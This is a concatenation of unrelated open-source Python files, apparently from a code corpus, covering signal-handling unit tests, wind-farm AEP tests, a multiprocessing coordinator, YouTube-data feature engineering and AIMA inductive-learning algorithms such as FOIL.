# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'inter process signals not reliable (do not mix well with threading) '
'on freebsd6')
def test_main(self):
# This function spawns a child process to insulate the main
# test-running process from all the signals. It then
# communicates with that child process over a pipe and
# re-raises information about any exceptions the child
# raises. The real work happens in self.run_test().
os_done_r, os_done_w = os.pipe()
with closing(os.fdopen(os_done_r, 'rb')) as done_r, \
closing(os.fdopen(os_done_w, 'wb')) as done_w:
child = os.fork()
if child == 0:
# In the child process; run the test and report results
# through the pipe.
try:
done_r.close()
# Have to close done_w again here because
# exit_subprocess() will skip the enclosing with block.
with closing(done_w):
try:
self.run_test()
except:
pickle.dump(traceback.format_exc(), done_w)
else:
pickle.dump(None, done_w)
except:
print('Uh oh, raised from pickle.')
traceback.print_exc()
finally:
exit_subprocess()
done_w.close()
# Block for up to MAX_DURATION seconds for the test to finish.
r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
if done_r in r:
tb = pickle.load(done_r)
if tb:
self.fail(tb)
else:
os.kill(child, signal.SIGKILL)
self.fail('Test deadlocked after %d seconds.' %
self.MAX_DURATION)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class BasicSignalTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows
signal.signal(sig, signal.signal(sig, handler))
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
def check_wakeup(self, test_body):
# use a subprocess to have only one thread and to not change signal
# handling of the parent process
code = """if 1:
import fcntl
import os
import signal
def handler(signum, frame):
pass
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
flags = fcntl.fcntl(write, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(write, fcntl.F_SETFL, flags)
signal.set_wakeup_fd(write)
test()
os.close(read)
os.close(write)
""".format(test_body)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the sleep,
# before select is called
time.sleep(TIMEOUT_FULL)
mid_time = time.time()
dt = mid_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.time()
dt = after_time - mid_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""")
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except select.error:
pass
else:
raise Exception("select.error not raised")
after_time = time.time()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
class Timeout(Exception):
pass
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
pass
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except OSError as err:
if err.errno != errno.EINTR:
raise
else:
sys.exit(2)
sys.exit(3)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
# Wait the process with a timeout of 5 seconds
timeout = time.time() + 5.0
while True:
if timeout < time.time():
raise Timeout()
status = process.poll()
if status is not None:
break
time.sleep(0.1)
stdout, stderr = process.communicate()
except Timeout:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %s"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
if support.verbose:
print("SIGALRM handler invoked", args)
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
if support.verbose:
print("last SIGVTALRM handler call")
self.hndl_count += 1
if support.verbose:
print("SIGVTALRM handler invoked", args)
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
if support.verbose:
print("SIGPROF handler invoked", args)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
if support.verbose:
print("\ncall pause()...")
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('freebsd6', 'netbsd5'),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'itimer not reliable (does not mix well with threading) on freebsd6')
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_main():
try:
support.run_unittest(BasicSignalTests, InterProcessSignalTests,
WakeupSignalTests, SiginterruptTest,
ItimerTest, WindowsSignalTests)
finally:
support.reap_children()
if __name__ == "__main__":
test_main()
| 35.914286 | 80 | 0.579528 |
4a1b4aea445a44bb0354406a59901ff6cd1f7daf
| 2,809 |
py
|
Python
|
src/fusedwind/plant_flow/test/test_asym.py
|
FUSED-Wind/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 15 |
2015-01-19T18:20:35.000Z
|
2021-12-21T05:50:38.000Z
|
src/fusedwind/plant_flow/test/test_asym.py
|
michaelXDzhang/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 61 |
2015-01-05T02:47:35.000Z
|
2019-10-09T02:18:13.000Z
|
src/fusedwind/plant_flow/test/test_asym.py
|
michaelXDzhang/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 11 |
2015-01-16T03:05:49.000Z
|
2021-02-16T13:57:59.000Z
|
# test_fused_plant_asym
from random import random
import unittest
from fusedwind.plant_flow.asym import *
from test_comp import TestWindFarm
from test_vt import generate_random_GenericWindRoseVT
from fusedwind.plant_flow.generate_fake_vt import generate_random_wt_layout
import numpy as np
def generate_inputs_AEPWindRose(aep):
aep.wind_speeds = linspace(0., 30, np.random.randint(30)).tolist()
aep.wind_directions = linspace(0., 360, np.random.randint(360))[:-1].tolist()
class test_AEPSingleWindRose(unittest.TestCase):
def test_init(self):
aep = AEPSingleWindRose()
def test_configure(self):
aep = AEPSingleWindRose()
aep.configure()
def test_run(self):
aep = AEPSingleWindRose()
aep.add('wf', TestWindFarm())
#aep.run()
#generate_inputs_AEPWindRose(aep)
wr = generate_random_GenericWindRoseVT()
aep.wind_rose = wr.frequency_array
aep.wind_speeds = wr.wind_speeds
aep.wind_directions = wr.wind_directions
#aep.create_passthrough('wf.wt_layout')
aep.wf.wt_layout = generate_random_wt_layout(nwt=50)
aep.run()
#print aep.net_aep, aep.gross_aep, aep.capacity_factor, aep.array_aep
assert aep.net_aep > 0.0, 'net_aep hasn\'t been set properlyy: %f'%(aep.net_aep)
# TODO: set make the gross_aep work properly
#assert aep.gross_aep > 0.0, 'gross_aep hasn\'t been set properly: %f'%(aep.gross_aep)
#assert aep.gross_aep < aep.net_aep, 'gross_aep or net_aep haven\'t been set properly: gross=%f, net=%f'%(aep.gross_aep, aep.net_aep)
#assert aep.capacity_factor > 0.0 and aep.capacity_factor < 1.0, 'capacity factor is unrealistic: %f'%(aep.capacity_factor)
#import ipdb; ipdb.set_trace()
class MyTestWindFarm(GenericWindFarm):
def execute(self):
self.wt_power = [random() * wt_desc.power_rating for wt_desc in self.wt_layout.wt_list]
self.wt_thrust = [pow_ / (random() * self.wind_speed) for pow_ in self.wt_power]
self.power = sum(self.wt_power)
self.thrust = sum(self.wt_thrust)
class test_AEPMultipleWindRoses(unittest.TestCase):
def test_init(self):
aep = AEPMultipleWindRoses()
def test_configure(self):
aep = AEPMultipleWindRoses()
aep.configure()
def test_execute(self):
cG = AEPMultipleWindRoses()
cG.add('wf', MyTestWindFarm())
cG.configure()
cG.connect('wt_layout', 'wf.wt_layout')
cG.wind_speeds = np.linspace(4., 25., 10).tolist()
cG.wind_directions = np.linspace(0., 360., 36)[:-1].tolist()
nwt = 5
cG.wt_layout = generate_random_wt_layout(nwt=nwt)
cG.run()
print cG.net_aep
print cG.wt_aep
if __name__ == '__main__':
unittest.main()
| 36.012821 | 141 | 0.676753 |
4a1b4b766365303c8fcd0b127155f7cf38d14197
| 1,952 |
py
|
Python
|
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | 1 |
2022-01-12T06:27:43.000Z
|
2022-01-12T06:27:43.000Z
|
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | null | null | null |
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | 2 |
2020-01-24T20:07:09.000Z
|
2022-01-12T06:27:47.000Z
|
"""
File: async_coordinator
Date: 9/21/19
Author: Jon Deaton (jonpauldeaton@gmail.com)
"""
from multiprocessing import Process, Queue, Condition, Semaphore
class AsyncCoordinator:
""" manages a collection of worker processes that
produce data to be consumed by the client of this class.
"""
def __init__(self, num_workers, worker_target, args):
""" Construct
:param num_workers: the number of worker processes
:param worker_target: function for each worker process to execute
:param args: the aforementioned additional
arguments to be passed to each worker
"""
self.num_workers = num_workers
self.worker_target = worker_target
self.args = args
self.queue = None
self.sema = None
self._workers = None
def open(self):
""" creates the collection of managed worker processes """
self.queue = Queue()
self.sema = Semaphore(0)
self._workers = []
for wid in range(self.num_workers):
worker = Process(target=self.worker_target,
args=(wid, self.queue, self.sema) + self.args)
worker.start()
self._workers.append(worker)
def close(self):
""" destroys the worker processes """
del self.queue
for worker in self._workers:
worker.terminate()
worker.join()
def start(self):
""" signals all worker processes to begin """
for _ in range(self.num_workers):
self.sema.release()
def pop(self):
""" blocks until there is a datum in the queue
produced by a worker, then removes and returns it.
"""
if self.queue is None:
raise Exception()
return self.queue.get()
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| 29.134328 | 75 | 0.602459 |
4a1b4bccbe171878b7f9940e273e436875e773cd
| 10,304 |
py
|
Python
|
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import re as re
from base import Feature, get_arguments, generate_features
Feature.dir = 'features'
# """sample usage
# """
# class Pclass(Feature):
# def create_features(self):
# self.train['Pclass'] = train['Pclass']
# self.test['Pclass'] = test['Pclass']
class Year(Feature):
def create_features(self):
self.train["year"] = pd.to_datetime(train["publishedAt"]).dt.year
self.test["year"] = pd.to_datetime(test["publishedAt"]).dt.year
class Month(Feature):
def create_features(self):
self.train["month"] = pd.to_datetime(train["publishedAt"]).dt.month
self.test["month"] = pd.to_datetime(test["publishedAt"]).dt.month
class Day(Feature):
def create_features(self):
self.train["day"] = pd.to_datetime(train["publishedAt"]).dt.day
self.test["day"] = pd.to_datetime(test["publishedAt"]).dt.day
class Hour(Feature):
def create_features(self):
self.train["hour"] = pd.to_datetime(train["publishedAt"]).dt.hour
self.test["hour"] = pd.to_datetime(test["publishedAt"]).dt.hour
class Minute(Feature):
def create_features(self):
self.train["minute"] = pd.to_datetime(train["publishedAt"]).dt.minute
self.test["minute"] = pd.to_datetime(test["publishedAt"]).dt.minute
def return_collection_dt(df):
df['collection_date'] = df["collection_date"]
return pd.to_datetime(df['collection_date'], format="%y.%d.%m")
class C_year(Feature):
def create_features(self):
self.train["c_year"] = return_collection_dt(train).dt.year
self.test["c_year"] = return_collection_dt(test).dt.year
class C_month(Feature):
def create_features(self):
self.train["c_month"] = return_collection_dt(train).dt.month
self.test["c_month"] = return_collection_dt(test).dt.month
class C_month(Feature):
def create_features(self):
self.train["c_month"] = return_collection_dt(train).dt.month
self.test["c_month"] = return_collection_dt(test).dt.month
class C_day(Feature):
def create_features(self):
self.train["c_day"] = return_collection_dt(train).dt.day
self.test["c_day"] = return_collection_dt(test).dt.day
class Length_tags(Feature):
def create_features(self):
self.train["length_tags"] = train['tags'].astype(
str).apply(lambda x: len(x.split("|")))
self.test["lenght_tags"] = test['tags'].astype(
str).apply(lambda x: len(x.split("|")))
class Category_id(Feature):
def create_features(self):
self.train["categoryId"] = train['categoryId']
self.test["categoryId"] = test['categoryId']
class Likes(Feature):
def create_features(self):
self.train["likes"] = train['likes']
self.test["likes"] = test['likes']
self.train["likes2"] = train['likes'] ** 2
self.test['likes2'] = test['likes'] ** 2
self.train['loglikes'] = np.log(train['likes']+1)
self.test['loglikes'] = np.log(test['likes']+1)
class Dislikes(Feature):
def create_features(self):
self.train["dislikes"] = train['dislikes']
self.test["dislikes"] = test['dislikes']
self.train["dislikes2"] = train['dislikes'] ** 2
self.test['dislikes2'] = test['dislikes'] ** 2
self.train['logdislikes'] = np.log(train['dislikes']+1)
self.test['logdislikes'] = np.log(test['dislikes']+1)
class Comment_count(Feature):
def create_features(self):
self.train["comment_count"] = train['comment_count']
self.test["comment_count"] = test['comment_count']
class Comments_disabled(Feature):
def create_features(self):
self.train["comments_disabled"] = train['comments_disabled']
self.test["comments_disabled"] = test['comments_disabled']
class Ratings_disabled(Feature):
def create_features(self):
self.train["ratings_disabled"] = train['ratings_disabled']
self.test["ratings_disabled"] = test['ratings_disabled']
class Channel_id_enc(Feature):
def create_features(self):
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
cat_cols = 'channelId'
df_all = pd.concat([train[cat_cols], test[cat_cols]])
le.fit(df_all)
self.train['channelId_enc'] = le.transform(train[cat_cols])
self.test['channelId_enc'] = le.transform(test[cat_cols])
class Dislikes_rate(Feature):
def create_features(self):
self.train['dislike_rate'] = train['dislikes'] / \
(train['likes'] + train["dislikes"])
self.test['dislike_rate'] = test['dislikes'] / \
(test['likes']+test['dislikes'])
class Likes_rate(Feature):
def create_features(self):
self.train["like_rate"] = train['likes'] / \
(train['likes'] + train['dislikes'])
self.test["like_rate"] = test['likes']/(test["dislikes"]+test["likes"])
class Likes_dislikes_rate(Feature):
def create_features(self):
self.train['likes_dislike_ratio'] = train['likes'] / \
(train['dislikes'] + 1)
self.test['likes_dislike_ratio'] = test['likes'] / (test['dislikes']+1)
class Channel_title_enc(Feature):
def create_features(self):
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
col = 'channelTitle'
df_all = pd.concat([train[col], test[col]])
le.fit(df_all)
self.train[col+'_enc'] = le.transform(train[col])
self.test[col+'_enc'] = le.transform(test[col])
class Comment_likes_dislikes_ratio(Feature):
def create_features(self):
self.train['comments_like_ratio'] = train['comment_count'] / \
(train['likes'] + 1)
self.test['comments_like_ratio'] = test['comment_count'] / \
(test['likes'] + 1)
self.train['comments_dislike_ratio'] = train['comment_count'] / \
(train['dislikes'] + 1)
self.test['comments_dislike_ratio'] = test['comment_count'] / \
(test['dislikes'] + 1)
class Likes_comments_disable(Feature):
def create_features(self):
self.train['likes_com'] = train['likes'] * train["comments_disabled"]
self.test['likes_com'] = test['likes'] * test["comments_disabled"]
self.train['dislikes_com'] = train['dislikes'] * \
train["comments_disabled"]
self.test['dislikes_com'] = test['dislikes'] * \
test["comments_disabled"]
self.train['comments_likes'] = train['comment_count'] * \
train['ratings_disabled']
self.test['comments_likes'] = test['comment_count'] * \
test['ratings_disabled']
class Delta_time(Feature):
def create_features(self):
train["collection_date"] = pd.to_datetime(
"20" + train["collection_date"], format="%Y.%d.%m", utc=True)
test["collection_date"] = pd.to_datetime(
"20" + test["collection_date"], format="%Y.%d.%m", utc=True)
train["publishedAt"] = pd.to_datetime(train['publishedAt'], utc=True)
test["publishedAt"] = pd.to_datetime(test['publishedAt'], utc=True)
self.train["delta"] = (train["collection_date"] - train["publishedAt"]
).apply(lambda x: x.days)
self.test["delta"] = (test["collection_date"] - test["publishedAt"]
).apply(lambda x: x.days)
self.train['log_delta'] = np.log(self.train['delta'])
self.test['log_delta'] = np.log(self.test['delta'])
class Description(Feature):
def create_features(self):
train['description'].fillna(" ", inplace=True)
test['description'].fillna(" ", inplace=True)
self.train['has_http'] = train['description'].apply(
lambda x: x.lower().count('http'))
self.test['has_http'] = test['description'].apply(
lambda x: x.lower().count('http'))
self.train['len_description'] = train['description'].apply(
lambda x: len(x))
self.test['len_description'] = test['description'].apply(
lambda x: len(x))
class Music(Feature):
def create_features(self):
train['tags'].fillna(" ", inplace=True)
test['tags'].fillna(" ", inplace=True)
self.train['music_title'] = train['title'].apply(
lambda x: 'music' in x.lower())
self.test['music_title'] = test['title'].apply(
lambda x: 'music' in x.lower())
self.train['music_tabs'] = train['tags'].apply(
lambda x: 'music' in x.lower())
self.test['music_tabs'] = test['tags'].apply(
lambda x: 'music' in x.lower())
class Official(Feature):
def create_features(self):
self.train['official_title'] = train['title'].apply(
lambda x: 'fficial' in x.lower())
self.test['official_title'] = test['title'].apply(
lambda x: 'fficial' in x.lower())
self.train['official_ja'] = train['title'].apply(
lambda x: '公式' in x.lower())
self.test['official_ja'] = test['title'].apply(
lambda x: '公式' in x.lower())
class CM(Feature):
def create_features(self):
train['tags'].fillna(" ", inplace=True)
test['tags'].fillna(" ", inplace=True)
train['description'].fillna(" ", inplace=True)
test['description'].fillna(" ", inplace=True)
self.train['cm_title'] = train['title'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_title'] = test['title'].apply(
lambda x: 'cm' in x.lower())
self.train['cm_tags'] = train['tags'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_tags'] = test['tags'].apply(
lambda x: 'cm' in x.lower())
self.train['cm_description'] = train['description'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_description'] = test['description'].apply(
lambda x: 'cm' in x.lower())
if __name__ == '__main__':
args = get_arguments()
# train = pd.read_feather('./data/input/train.feather')
# test = pd.read_feather('./data/input/test.feather')
train = pd.read_feather('./data/input/train.feather')
test = pd.read_feather('./data/input/test.feather')
generate_features(globals(), args.force)
| 35.902439 | 79 | 0.614227 |
4a1b4bda7371138ebd2567b5a3db0257c9d1f574
| 13,760 |
py
|
Python
|
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | null | null | null |
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | null | null | null |
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | 1 |
2019-10-26T22:33:40.000Z
|
2019-10-26T22:33:40.000Z
|
"""Knowledge in learning, Chapter 19"""
from random import shuffle
from math import log
from utils import powerset
from collections import defaultdict
from itertools import combinations, product
from logic import (FolKB, constant_symbols, predicate_symbols, standardize_variables,
variables, is_definite_clause, subst, expr, Expr)
from functools import partial
# ______________________________________________________________________________
def current_best_learning(examples, h, examples_so_far=[]):
""" [Figure 19.2]
The hypothesis is a list of dictionaries, with each dictionary representing
a disjunction."""
if not examples:
return h
e = examples[0]
if is_consistent(e, h):
return current_best_learning(examples[1:], h, examples_so_far + [e])
elif false_positive(e, h):
for h2 in specializations(examples_so_far + [e], h):
h3 = current_best_learning(examples[1:], h2, examples_so_far + [e])
if h3 != 'FAIL':
return h3
elif false_negative(e, h):
for h2 in generalizations(examples_so_far + [e], h):
h3 = current_best_learning(examples[1:], h2, examples_so_far + [e])
if h3 != 'FAIL':
return h3
return 'FAIL'
def specializations(examples_so_far, h):
"""Specialize the hypothesis by adding AND operations to the disjunctions"""
hypotheses = []
for i, disj in enumerate(h):
for e in examples_so_far:
for k, v in e.items():
if k in disj or k == 'GOAL':
continue
h2 = h[i].copy()
h2[k] = '!' + v
h3 = h.copy()
h3[i] = h2
if check_all_consistency(examples_so_far, h3):
hypotheses.append(h3)
shuffle(hypotheses)
return hypotheses
def generalizations(examples_so_far, h):
"""Generalize the hypothesis. First delete operations
(including disjunctions) from the hypothesis. Then, add OR operations."""
hypotheses = []
# Delete disjunctions
disj_powerset = powerset(range(len(h)))
for disjs in disj_powerset:
h2 = h.copy()
for d in reversed(list(disjs)):
del h2[d]
if check_all_consistency(examples_so_far, h2):
hypotheses += h2
# Delete AND operations in disjunctions
for i, disj in enumerate(h):
a_powerset = powerset(disj.keys())
for attrs in a_powerset:
h2 = h[i].copy()
for a in attrs:
del h2[a]
if check_all_consistency(examples_so_far, [h2]):
h3 = h.copy()
h3[i] = h2.copy()
hypotheses += h3
# Add OR operations
if hypotheses == [] or hypotheses == [{}]:
hypotheses = add_or(examples_so_far, h)
else:
hypotheses.extend(add_or(examples_so_far, h))
shuffle(hypotheses)
return hypotheses
def add_or(examples_so_far, h):
"""Add an OR operation to the hypothesis. The AND operations in the disjunction
are generated by the last example (which is the problematic one)."""
ors = []
e = examples_so_far[-1]
attrs = {k: v for k, v in e.items() if k != 'GOAL'}
a_powerset = powerset(attrs.keys())
for c in a_powerset:
h2 = {}
for k in c:
h2[k] = attrs[k]
if check_negative_consistency(examples_so_far, h2):
h3 = h.copy()
h3.append(h2)
ors.append(h3)
return ors
# ______________________________________________________________________________
def version_space_learning(examples):
""" [Figure 19.3]
The version space is a list of hypotheses, which in turn are a list
of dictionaries/disjunctions."""
V = all_hypotheses(examples)
for e in examples:
if V:
V = version_space_update(V, e)
return V
def version_space_update(V, e):
return [h for h in V if is_consistent(e, h)]
def all_hypotheses(examples):
"""Build a list of all the possible hypotheses"""
values = values_table(examples)
h_powerset = powerset(values.keys())
hypotheses = []
for s in h_powerset:
hypotheses.extend(build_attr_combinations(s, values))
hypotheses.extend(build_h_combinations(hypotheses))
return hypotheses
def values_table(examples):
"""Build a table with all the possible values for each attribute.
Returns a dictionary with keys the attribute names and values a list
with the possible values for the corresponding attribute."""
values = defaultdict(lambda: [])
for e in examples:
for k, v in e.items():
if k == 'GOAL':
continue
mod = '!'
if e['GOAL']:
mod = ''
if mod + v not in values[k]:
values[k].append(mod + v)
values = dict(values)
return values
def build_attr_combinations(s, values):
"""Given a set of attributes, builds all the combinations of values.
If the set holds more than one attribute, recursively builds the
combinations."""
if len(s) == 1:
# s holds just one attribute, return its list of values
k = values[s[0]]
h = [[{s[0]: v}] for v in values[s[0]]]
return h
h = []
for i, a in enumerate(s):
rest = build_attr_combinations(s[i+1:], values)
for v in values[a]:
o = {a: v}
for r in rest:
t = o.copy()
for d in r:
t.update(d)
h.append([t])
return h
def build_h_combinations(hypotheses):
"""Given a set of hypotheses, builds and returns all the combinations of the
hypotheses."""
h = []
h_powerset = powerset(range(len(hypotheses)))
for s in h_powerset:
t = []
for i in s:
t.extend(hypotheses[i])
h.append(t)
return h
# ______________________________________________________________________________
def minimal_consistent_det(E, A):
"""Return a minimal set of attributes which give consistent determination"""
n = len(A)
for i in range(n + 1):
for A_i in combinations(A, i):
if consistent_det(A_i, E):
return set(A_i)
def consistent_det(A, E):
"""Check if the attributes(A) is consistent with the examples(E)"""
H = {}
for e in E:
attr_values = tuple(e[attr] for attr in A)
if attr_values in H and H[attr_values] != e['GOAL']:
return False
H[attr_values] = e['GOAL']
return True
# ______________________________________________________________________________
class FOIL_container(FolKB):
"""Hold the kb and other necessary elements required by FOIL."""
def __init__(self, clauses=None):
self.const_syms = set()
self.pred_syms = set()
FolKB.__init__(self, clauses)
def tell(self, sentence):
if is_definite_clause(sentence):
self.clauses.append(sentence)
self.const_syms.update(constant_symbols(sentence))
self.pred_syms.update(predicate_symbols(sentence))
else:
raise Exception("Not a definite clause: {}".format(sentence))
def foil(self, examples, target):
"""Learn a list of first-order horn clauses
'examples' is a tuple: (positive_examples, negative_examples).
positive_examples and negative_examples are both lists which contain substitutions."""
clauses = []
pos_examples = examples[0]
neg_examples = examples[1]
while pos_examples:
clause, extended_pos_examples = self.new_clause((pos_examples, neg_examples), target)
# remove positive examples covered by clause
pos_examples = self.update_examples(target, pos_examples, extended_pos_examples)
clauses.append(clause)
return clauses
def new_clause(self, examples, target):
"""Find a horn clause which satisfies part of the positive
examples but none of the negative examples.
The horn clause is specified as [consequent, list of antecedents]
Return value is the tuple (horn_clause, extended_positive_examples)."""
clause = [target, []]
# [positive_examples, negative_examples]
extended_examples = examples
while extended_examples[1]:
l = self.choose_literal(self.new_literals(clause), extended_examples)
clause[1].append(l)
extended_examples = [sum([list(self.extend_example(example, l)) for example in
extended_examples[i]], []) for i in range(2)]
return (clause, extended_examples[0])
def extend_example(self, example, literal):
"""Generate extended examples which satisfy the literal."""
# find all substitutions that satisfy literal
for s in self.ask_generator(subst(example, literal)):
s.update(example)
yield s
def new_literals(self, clause):
"""Generate new literals based on known predicate symbols.
Generated literal must share atleast one variable with clause"""
share_vars = variables(clause[0])
for l in clause[1]:
share_vars.update(variables(l))
for pred, arity in self.pred_syms:
new_vars = {standardize_variables(expr('x')) for _ in range(arity - 1)}
for args in product(share_vars.union(new_vars), repeat=arity):
if any(var in share_vars for var in args):
# make sure we don't return an existing rule
if not Expr(pred, args) in clause[1]:
yield Expr(pred, *[var for var in args])
